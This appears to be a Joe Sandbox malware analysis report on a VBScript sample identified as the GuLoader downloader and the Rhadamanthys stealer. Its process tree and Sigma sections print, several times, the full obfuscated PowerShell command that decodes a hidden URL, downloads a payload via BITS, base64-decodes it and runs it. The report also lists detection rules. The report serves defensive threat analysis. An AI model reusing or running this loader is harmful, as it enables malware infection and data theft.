Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
F8HYX5HOgA.vbs

Overview

General Information

Sample name:F8HYX5HOgA.vbs
renamed because original name is a hash value
Original sample name:ace5b87a91d37f57a3288800b585268dbc4c1efde0417521f98b1fd4b86beff1.vbs
Analysis ID:1578227
MD5:85d4ef0ba65b5d677d8a3b3772542ea7
SHA1:b73d4b3d582213d2d350a86603f6a3b1d60cce03
SHA256:ace5b87a91d37f57a3288800b585268dbc4c1efde0417521f98b1fd4b86beff1
Tags:185-236-228-9287-120-112-91vbswww-al-rasikh-comuser-JAMESWT_MHT
Infos:

Detection

GuLoader, RHADAMANTHYS
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected RHADAMANTHYS Stealer
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Powershell uses Background Intelligent Transfer Service (BITS)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5444 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\F8HYX5HOgA.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 5708 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Krse ($Udrensnri){For($Holdk=7; $Holdk -lt $Udrensnri.Length-1; $Holdk+=8){ $bekraefte+=$Udrensnri.Substring($Holdk, 1);}$bekraefte;}$bekraefte01=Krse 'Unrelini SouffleRovsedexHinchmi ';$bekraefte02=Krse 'AllitteTLgninger NonminaSnorkelnDrawplasHydrostfCodificeAchiertrBindheirkarnevai QuadrinRegressgProphet ';function Fundmong ($Avoutry){. ($bekraefte01) ($Avoutry);}$Jaspedam82=Krse 'CelebrehStenklvtDybdemat Expetipsemidels Blackl: Bemest/Bromidi/CandollwPlateaswrochetswDrtrinn.RefereraUtaethes SteurotFantasteDalliannLeafedstTilbageeHyperacrPremillp OddfelrIronikeiFunderes ForlageLocomots nonaff.SubtotacVarmefroCreaminmPlatypt.FormatkplibidinkSandsyn/RebozotmKimsendsBygning/BaggaarS OvertepKistegleUninundjMeedful.Ideologt TenuirtTuckykof Overen ';$bekraefte00=Krse 'approks$ SternngGynecollRoofwisoTaipoclbbetonrkaLogopedlFloddel:BacilleCTransforKlemskruYnkvrdisPartakiaInitiald KodifioDonskywvBloodthaTyggende Stykvr8nonvend Melone= Forste DecolonS AlphabtMinikenaForhaanrGeneralt Plasmo-IndfrelBAvlsbruiDvrgeflt AbdelrsNerviikTForslver Pederaa SubternHeadless Hilsepf HundreeRsknernr Unphil Rokkene-MystifiS OverfloFrembriuEconomir SignalcLuftrrbeVarmeis Crotche$AmtskomJSiddebaaAssembls PlastipParvifoe Tiltogd BoundlaBestialmPemmica8Angribe2Toiletp encomi-ArveretDstuppeneBibabudsMotionetLandfogiResentsnaktiekaaSupersatUnderstipathletoSjllandnforlyst Praktis$SammenbCBeechamrIrongoluFunestasSchlossaPestersdJgerstuo NonprovNonpessaRationae Cofoun2Spaecra ';Fundmong (Krse 'Omfangs$TumultegGaardsplPastieroUrbiaspbindpakkaSymfonilafdrags:AcolhuaCAfspndirCarlineuModellesFlgenesaFalanksd BommenoKaffetivMultiplaBekmpelePerpetu2Promisi=Imitato$ProduktePurgatinIncomprvSulfini: KartotaNonintepPersillp BeaverdVildepraFolacintFugersoaMispris ') ;Fundmong (Krse 'AfbenytIFalderamSlingrepturbehsoCryptohrPanicketEtagese-GeograpMUnarbitoUafvised Erstatu Biscayl Pimpere Parado OutmarrBUntrammiAfgudentresultasFlerbruTStansemrSvineavachurnfunOptjercsVedtagefRedecideKikrterrAfhvlin ') ;$Crusadovae2=$Crusadovae2+'\Notorhiza.Sal' ;Fundmong (Krse ' slambr$DebusedgGlobatel Telpheo AnskuebFlagstraEbbcritlKokseth:rredtekC limfarrMslsveru RutsjesAabjrnsaRestipud Prefoco CandidvAgrarkoaDespitoeDeceler7Mashall=imperfo(GuslarpTLovforbeGilenorsChloroptUnbelie-PleurahPPreasceaStillelt ForklahMerceri Corrive$AugustoCUdhamrircosmeteuSelskabsGallakla PillerdOpsadleoRosethavAntbirdaSvingnietrawled2Hippocr)Fairlea ') ;while (-not $Crusadovae7) {Fundmong (Krse 'DiscernISpreneufLegende Sulphoh(Waggonl$eksplosCPyramidrInverseu LepilespaltereaTidsskrdDriftskoWhiterovSpirantaMeasurieUnlovea8Dkliste.TumlersJ securioKryptonbCifferlSSwollentSkifertaSandormtRedeploeHvorind Smykken-ChambereSkebladqfyrsted Biestin$Kahytsjb Atommie AktivikStilkunrKatapulaNapoleoeLykkebrfProtoprtSpearmieDriftsr0Udsprjt2tankefu) Nbbene Jamaic{BeskrivS Despott MamushaIrradiarHalvbrotEthenoi-BreakthSAmphibil SkremaecarnifieCloverlpKursusf Reklaps1 Injuri}Oversate UnderwlTotalvgs TiresreErsalfa{SammenhSAlansbotFacettea Syphilr forerutPreulti-AncyroiSCassocklArbejdseSluicedeEarthsepAndenda Mlterrn1Kommena;SexagesFCirkusmu KonklunnonfinidContagimFrynsenoSheiladnsaltishgAttribu Moniti$Ventoseb Verniee LowerskGangliorHeteropaZoopatheFlettonfHoefligtMendelieJoshrou0Selvbet0Fotogra}Fagudda ');Fundmong (Krse ' Udledn$FarrisagGroteskl PresteoSkalperbValnddeaUnscrewl Piezom: FortalC LyderurKingleau BlockasparathyaStrandhdIntensioOlympiavHaandpaaMystacaeChasses7Irregja=Danefst(BinderiT RektoreCooreeus PaagretArtisko- LuftruPUnpropia Fodgngt DorylihKontakt Mathiah$OutmeasCTriartirUnasceruKnistensConjureaNormeridScriptuo BlgetrvPostlapaSlagsvre bookpr2 Overvr)Stakero ') ;}Fundmong (Krse 'estriat$GubbinsgEltonkllHermeneo BlidgrbDemissia SubjeklLuftala:AbrasaxGanuextraSkriveuzDisgusteFinansgnKristjap TaarnhaOpslmmerRegnskatThongdinBrneopd1Discolo7unaccus Agrgodk=Forvirr GradphoG PindsveKonkurrtDokefor-InterceCGrshoppo TilmelnScrapint DobbeleRadarovn Ingratt Begynd Tactin$VagarisCacidprorBisquesuSagtmodsBlaamusaCincinadGemmernoForhandvJeronymaAxolotle Bovnen2Overfie ');Fundmong (Krse 'Stagnin$DisseisgSpotligl KapninobaarebubHenfaldaHighflilMouthbr: PaastaOFortrylpToddlerdThiosula FriandtTrophieeOleoster FinaliiBrigadenUnacetigPalaeoc Brodni=Triolog Derover[BimanasS KokosbyAmyunnasPrototatPrologkeKvotastmFunctio.LskedriCTaabelioInsularnsudsingvpietisme TicklerWarnisstEnuncia] tuberc: Eyelet:AfvisesFSkriverrRespecioQuisquimOutactiBIntestia Runddes Rangore Starbl6Yachtie4uselskaSPignolitGodarterPaganisi DrawknnAdgangsgHeintje(Pursier$CalicosGCatenataContempzflercife kvidisnInsubdupHessianaIatroterJambedntUnconcenKongres1Statsli7Sceneme)Ruttera ');Fundmong (Krse 'trident$EksegetgBelivesldistriboUdspndtb PascalaHendecal Unquel:Medflgkb BilabieFodnotek Bobbysr Knappea AssocieBryologf PrivattEstopgeeFgtekaa2 Paavir Fiskekr=Daahind Inaugur[DecastcS knivmuyHalvlegs Scrawlt Subchoepositifm Kjrsga.PolymorToutliveeDialogix CloturtHepatot. PalamiE PhoebenOksefilc TekstkoAssessodMuseebai EmpighnUnscrapg Turist]valgret:Kylling:UnspeciAgluepotS SponsoCBombaziIFulviavIHmroege.FiberedGMetropoeEmulsoit ClavatSKneadmetVerbenarAphthoniMaaltidnAffiesvgTogfrer(Ekshibi$ProportOCodaspopvallisedTaenioiaMumacryt rammeve BrevskrCocompoi iviedmnRetsinsgMajuscu)Hylests ');Fundmong (Krse 'Reneger$Pickersgfllesanl misorgoOutchidbNedskriaMulticol Afhaar:ForsmdebAnnielleSubthrek HalogerBiofysiaStatsameCymlingflettiettPatienteinjuran3 samfun=Randrus$OvercrabAffaldseUtopistkrdviolerAutomata Hugsple PredoufKissemitEkstempeFodring2Tediums. UdviklsKameelsu decinobSkggedes AnfordtVenligtr JuveleiMisnumbnInstillgfrinumr(Talwars2Sgraffi7Sclerot2 Skjold2Nonsupp6Mormonb0Somatat,Planlgn2 Desill3 Rainin7 Anstan2Minilec9slidsni)Baragno ');Fundmong $bekraefte3;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4856 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Krse ($Udrensnri){For($Holdk=7; $Holdk -lt $Udrensnri.Length-1; $Holdk+=8){ $bekraefte+=$Udrensnri.Substring($Holdk, 1);}$bekraefte;}$bekraefte01=Krse 'Unrelini SouffleRovsedexHinchmi ';$bekraefte02=Krse 'AllitteTLgninger NonminaSnorkelnDrawplasHydrostfCodificeAchiertrBindheirkarnevai QuadrinRegressgProphet ';function Fundmong ($Avoutry){. ($bekraefte01) ($Avoutry);}$Jaspedam82=Krse 'CelebrehStenklvtDybdemat Expetipsemidels Blackl: Bemest/Bromidi/CandollwPlateaswrochetswDrtrinn.RefereraUtaethes SteurotFantasteDalliannLeafedstTilbageeHyperacrPremillp OddfelrIronikeiFunderes ForlageLocomots nonaff.SubtotacVarmefroCreaminmPlatypt.FormatkplibidinkSandsyn/RebozotmKimsendsBygning/BaggaarS OvertepKistegleUninundjMeedful.Ideologt TenuirtTuckykof Overen ';$bekraefte00=Krse 'approks$ SternngGynecollRoofwisoTaipoclbbetonrkaLogopedlFloddel:BacilleCTransforKlemskruYnkvrdisPartakiaInitiald KodifioDonskywvBloodthaTyggende Stykvr8nonvend Melone= Forste DecolonS AlphabtMinikenaForhaanrGeneralt Plasmo-IndfrelBAvlsbruiDvrgeflt AbdelrsNerviikTForslver Pederaa SubternHeadless Hilsepf HundreeRsknernr Unphil Rokkene-MystifiS OverfloFrembriuEconomir SignalcLuftrrbeVarmeis Crotche$AmtskomJSiddebaaAssembls PlastipParvifoe Tiltogd BoundlaBestialmPemmica8Angribe2Toiletp encomi-ArveretDstuppeneBibabudsMotionetLandfogiResentsnaktiekaaSupersatUnderstipathletoSjllandnforlyst Praktis$SammenbCBeechamrIrongoluFunestasSchlossaPestersdJgerstuo NonprovNonpessaRationae Cofoun2Spaecra ';Fundmong (Krse 'Omfangs$TumultegGaardsplPastieroUrbiaspbindpakkaSymfonilafdrags:AcolhuaCAfspndirCarlineuModellesFlgenesaFalanksd BommenoKaffetivMultiplaBekmpelePerpetu2Promisi=Imitato$ProduktePurgatinIncomprvSulfini: KartotaNonintepPersillp BeaverdVildepraFolacintFugersoaMispris ') ;Fundmong (Krse 'AfbenytIFalderamSlingrepturbehsoCryptohrPanicketEtagese-GeograpMUnarbitoUafvised Erstatu Biscayl Pimpere Parado OutmarrBUntrammiAfgudentresultasFlerbruTStansemrSvineavachurnfunOptjercsVedtagefRedecideKikrterrAfhvlin ') ;$Crusadovae2=$Crusadovae2+'\Notorhiza.Sal' ;Fundmong (Krse ' slambr$DebusedgGlobatel Telpheo AnskuebFlagstraEbbcritlKokseth:rredtekC limfarrMslsveru RutsjesAabjrnsaRestipud Prefoco CandidvAgrarkoaDespitoeDeceler7Mashall=imperfo(GuslarpTLovforbeGilenorsChloroptUnbelie-PleurahPPreasceaStillelt ForklahMerceri Corrive$AugustoCUdhamrircosmeteuSelskabsGallakla PillerdOpsadleoRosethavAntbirdaSvingnietrawled2Hippocr)Fairlea ') ;while (-not $Crusadovae7) {Fundmong (Krse 'DiscernISpreneufLegende Sulphoh(Waggonl$eksplosCPyramidrInverseu LepilespaltereaTidsskrdDriftskoWhiterovSpirantaMeasurieUnlovea8Dkliste.TumlersJ securioKryptonbCifferlSSwollentSkifertaSandormtRedeploeHvorind Smykken-ChambereSkebladqfyrsted Biestin$Kahytsjb Atommie AktivikStilkunrKatapulaNapoleoeLykkebrfProtoprtSpearmieDriftsr0Udsprjt2tankefu) Nbbene Jamaic{BeskrivS Despott MamushaIrradiarHalvbrotEthenoi-BreakthSAmphibil SkremaecarnifieCloverlpKursusf Reklaps1 Injuri}Oversate UnderwlTotalvgs TiresreErsalfa{SammenhSAlansbotFacettea Syphilr forerutPreulti-AncyroiSCassocklArbejdseSluicedeEarthsepAndenda Mlterrn1Kommena;SexagesFCirkusmu KonklunnonfinidContagimFrynsenoSheiladnsaltishgAttribu Moniti$Ventoseb Verniee LowerskGangliorHeteropaZoopatheFlettonfHoefligtMendelieJoshrou0Selvbet0Fotogra}Fagudda ');Fundmong (Krse ' Udledn$FarrisagGroteskl PresteoSkalperbValnddeaUnscrewl Piezom: FortalC LyderurKingleau BlockasparathyaStrandhdIntensioOlympiavHaandpaaMystacaeChasses7Irregja=Danefst(BinderiT RektoreCooreeus PaagretArtisko- LuftruPUnpropia Fodgngt DorylihKontakt Mathiah$OutmeasCTriartirUnasceruKnistensConjureaNormeridScriptuo BlgetrvPostlapaSlagsvre bookpr2 Overvr)Stakero ') ;}Fundmong (Krse 'estriat$GubbinsgEltonkllHermeneo BlidgrbDemissia SubjeklLuftala:AbrasaxGanuextraSkriveuzDisgusteFinansgnKristjap TaarnhaOpslmmerRegnskatThongdinBrneopd1Discolo7unaccus Agrgodk=Forvirr GradphoG PindsveKonkurrtDokefor-InterceCGrshoppo TilmelnScrapint DobbeleRadarovn Ingratt Begynd Tactin$VagarisCacidprorBisquesuSagtmodsBlaamusaCincinadGemmernoForhandvJeronymaAxolotle Bovnen2Overfie ');Fundmong (Krse 'Stagnin$DisseisgSpotligl KapninobaarebubHenfaldaHighflilMouthbr: PaastaOFortrylpToddlerdThiosula FriandtTrophieeOleoster FinaliiBrigadenUnacetigPalaeoc Brodni=Triolog Derover[BimanasS KokosbyAmyunnasPrototatPrologkeKvotastmFunctio.LskedriCTaabelioInsularnsudsingvpietisme TicklerWarnisstEnuncia] tuberc: Eyelet:AfvisesFSkriverrRespecioQuisquimOutactiBIntestia Runddes Rangore Starbl6Yachtie4uselskaSPignolitGodarterPaganisi DrawknnAdgangsgHeintje(Pursier$CalicosGCatenataContempzflercife kvidisnInsubdupHessianaIatroterJambedntUnconcenKongres1Statsli7Sceneme)Ruttera ');Fundmong (Krse 'trident$EksegetgBelivesldistriboUdspndtb PascalaHendecal Unquel:Medflgkb BilabieFodnotek Bobbysr Knappea AssocieBryologf PrivattEstopgeeFgtekaa2 Paavir Fiskekr=Daahind Inaugur[DecastcS knivmuyHalvlegs Scrawlt Subchoepositifm Kjrsga.PolymorToutliveeDialogix CloturtHepatot. PalamiE PhoebenOksefilc TekstkoAssessodMuseebai EmpighnUnscrapg Turist]valgret:Kylling:UnspeciAgluepotS SponsoCBombaziIFulviavIHmroege.FiberedGMetropoeEmulsoit ClavatSKneadmetVerbenarAphthoniMaaltidnAffiesvgTogfrer(Ekshibi$ProportOCodaspopvallisedTaenioiaMumacryt rammeve BrevskrCocompoi iviedmnRetsinsgMajuscu)Hylests ');Fundmong (Krse 'Reneger$Pickersgfllesanl misorgoOutchidbNedskriaMulticol Afhaar:ForsmdebAnnielleSubthrek HalogerBiofysiaStatsameCymlingflettiettPatienteinjuran3 samfun=Randrus$OvercrabAffaldseUtopistkrdviolerAutomata Hugsple PredoufKissemitEkstempeFodring2Tediums. UdviklsKameelsu decinobSkggedes AnfordtVenligtr JuveleiMisnumbnInstillgfrinumr(Talwars2Sgraffi7Sclerot2 Skjold2Nonsupp6Mormonb0Somatat,Planlgn2 Desill3 Rainin7 Anstan2Minilec9slidsni)Baragno ');Fundmong $bekraefte3;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • wab.exe (PID: 2780 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • dialer.exe (PID: 1048 cmdline: "C:\Windows\system32\dialer.exe" MD5: E4BD77FB64DDE78F1A95ECE09F6A9B85)
  • svchost.exe (PID: 3712 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000003.2578876174.0000000005930000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    00000007.00000003.2575308321.00000000256F0000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      00000007.00000003.2574777767.00000000254D0000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        00000007.00000003.2571764775.0000000000A00000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
          00000009.00000003.2578561473.0000000005710000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            Click to see the 12 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.3.wab.exe.256f0000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              9.3.dialer.exe.5930000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                9.3.dialer.exe.5710000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  7.3.wab.exe.254d0000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security

                    Other

                    SourceRuleDescriptionAuthorStrings
                    amsi32_4856.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                    • 0xe0e0:$b2: ::FromBase64String(
                    • 0xcf00:$s1: -join
                    • 0x66ac:$s4: +=
                    • 0x676e:$s4: +=
                    • 0xa995:$s4: +=
                    • 0xcab2:$s4: +=
                    • 0xcd9c:$s4: +=
                    • 0xcee2:$s4: +=
                    • 0x15c1e:$s4: +=
                    • 0x15c9e:$s4: +=
                    • 0x15d64:$s4: +=
                    • 0x15de4:$s4: +=
                    • 0x15fba:$s4: +=
                    • 0x1603e:$s4: +=
                    • 0xd955:$e4: Get-WmiObject
                    • 0xdb44:$e4: Get-Process
                    • 0xdb9c:$e4: Start-Process
                    • 0x1475a:$e4: Get-Process

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: WScript or CScript Dropper
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\F8HYX5HOgA.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\F8HYX5HOgA.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\F8HYX5HOgA.vbs", ProcessId: 5444, ProcessName: wscript.exe
                    Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
                    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\dialer.exe", CommandLine: "C:\Windows\system32\dialer.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\dialer.exe, NewProcessName: C:\Windows\SysWOW64\dialer.exe, OriginalFileName: C:\Windows\SysWOW64\dialer.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 2780, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\system32\dialer.exe", ProcessId: 1048, ProcessName: dialer.exe
                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                    Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\F8HYX5HOgA.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\F8HYX5HOgA.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\F8HYX5HOgA.vbs", ProcessId: 5444, ProcessName: wscript.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Krse ($Udrensnri){For($Holdk=7; $Holdk -lt $Udrensnri.Length-1; $Holdk+=8){ $bekraefte+=$Udrensnri.Substring($Holdk, 1);}$bekraefte;}$bekraefte01=Krse 'Unrelini SouffleRovsedexHinchmi ';$bekraefte02=Krse 'AllitteTLgninger NonminaSnorkelnDrawplasHydrostfCodificeAchiertrBindheirkarnevai QuadrinRegressgProphet ';function Fundmong ($Avoutry){. ($bekraefte01) ($Avoutry);}$Jaspedam82=Krse 'CelebrehStenklvtDybdemat Expetipsemidels Blackl: Bemest/Bromidi/CandollwPlateaswrochetswDrtrinn.RefereraUtaethes SteurotFantasteDalliannLeafedstTilbageeHyperacrPremillp OddfelrIronikeiFunderes ForlageLocomots nonaff.SubtotacVarmefroCreaminmPlatypt.FormatkplibidinkSandsyn/RebozotmKimsendsBygning/BaggaarS OvertepKistegleUninundjMeedful.Ideologt TenuirtTuckykof Overen ';$bekraefte00=Krse 'approks$ SternngGynecollRoofwisoTaipoclbbetonrkaLogopedlFloddel:BacilleCTransforKlemskruYnkvrdisPartakiaInitiald KodifioDonskywvBloodthaTyggende Stykvr8nonvend Melone= Forste DecolonS AlphabtMinikenaForhaanrGeneralt Plasmo-IndfrelBAvlsbruiDvrgeflt AbdelrsNerviikTForslver Pederaa SubternHeadless Hilsepf HundreeRsknernr Unphil Rokkene-MystifiS OverfloFrembriuEconomir SignalcLuftrrbeVarmeis Crotche$AmtskomJSiddebaaAssembls PlastipParvifoe Tiltogd BoundlaBestialmPemmica8Angribe2Toiletp encomi-ArveretDstuppeneBibabudsMotionetLandfogiResentsnaktiekaaSupersatUnderstipathletoSjllandnforlyst Praktis$SammenbCBeechamrIrongoluFunestasSchlossaPestersdJgerstuo NonprovNonpessaRationae Cofoun2Spaecra ';Fundmong (Krse 'Omfangs$TumultegGaardsplPastieroUrbiaspbindpakkaSymfonilafdrags:AcolhuaCAfspndirCarlineuModellesFlgenesaFalanksd BommenoKaffetivMultiplaBekmpelePerpetu2Promisi=Imitato$ProduktePurgatinIncomprvSulfini: KartotaNonintepPersillp BeaverdVildepraFolacintFugersoaMispris ') ;Fundmong (Krse 'AfbenytIFalderamSlingrepturbehsoCryptohrPanicketEtagese-GeograpMUnarbitoUafvised Erstatu Biscayl Pimpere Parado OutmarrBUntrammiAfgudentresultasFlerbruTStansemrSvineavachurnfunOptjercsVedtagefRedecideKikrterrAfhvlin ') ;$Crusadovae2=$Crusadovae2+'\Notorhiza.Sal' ;Fundmong (Krse ' slambr$DebusedgGlobatel Telpheo AnskuebFlagstraEbbcritlKokseth:rredtekC limfarrMslsveru RutsjesAabjrnsaRestipud Prefoco CandidvAgrarkoaDespitoeDeceler7Mashall=imperfo(GuslarpTLovforbeGilenorsChloroptUnbelie-PleurahPPreasceaStillelt ForklahMerceri Corrive$AugustoCUdhamrircosmeteuSelskabsGallakla PillerdOpsadleoRosethavAntbirdaSvingnietrawled2Hippocr)Fairlea ') ;while (-not $Crusadovae7) {Fundmong (Krse 'DiscernISpreneufLegende Sulphoh(Waggonl$eksplosCPyramidrInverseu LepilespaltereaTidsskrdDriftskoWhiterovSpirantaMeasurieUnlovea8Dkliste.TumlersJ securioKryptonbCifferlSSwollentSkifertaSandormtRedeploeHvorind Smykken-ChambereSkebladqfyrsted Biestin$Kahytsjb Atommie AktivikStilkunrKatapulaNapoleoeLykkebrfProtoprtSpearmieDriftsr0Udsprjt2tankefu) Nbbene Jamaic{BeskrivS Despott MamushaIrradiarHalvbrotEthenoi-BreakthSAmphibil SkremaecarnifieCloverlpKursusf R
                    Sigma detected: Windows Processes Suspicious Parent Directory
                    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3712, ProcessName: svchost.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-19T12:48:32.209044+010028032702Potentially Bad Traffic192.168.2.549771103.120.177.150443TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: F8HYX5HOgA.vbsAvira: detected
                    Multi AV Scanner detection for submitted file
                    Source: F8HYX5HOgA.vbsVirustotal: Detection: 46%Perma Link
                    Source: F8HYX5HOgA.vbsReversingLabs: Detection: 42%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: unknownHTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.5:49707 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 103.120.177.150:443 -> 192.168.2.5:49771 version: TLS 1.2
                    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2544913073.0000000007047000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: wkernel32.pdb source: wab.exe, 00000007.00000003.2574386821.00000000255F0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000005.00000002.2550855628.0000000007F27000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: wkernelbase.pdb source: wab.exe, 00000007.00000003.2575308321.00000000256F0000.00000004.00000001.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2574777767.00000000254D0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: ntdll.pdb source: wab.exe, 00000007.00000003.2572739867.00000000254D0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdbUGP source: wab.exe, 00000007.00000003.2573715561.0000000025670000.00000004.00000001.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2573394658.00000000254D0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: ntdll.pdbUGP source: wab.exe, 00000007.00000003.2572739867.00000000254D0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2536849712.000000000081E000.00000004.00000020.00020000.00000000.sdmp
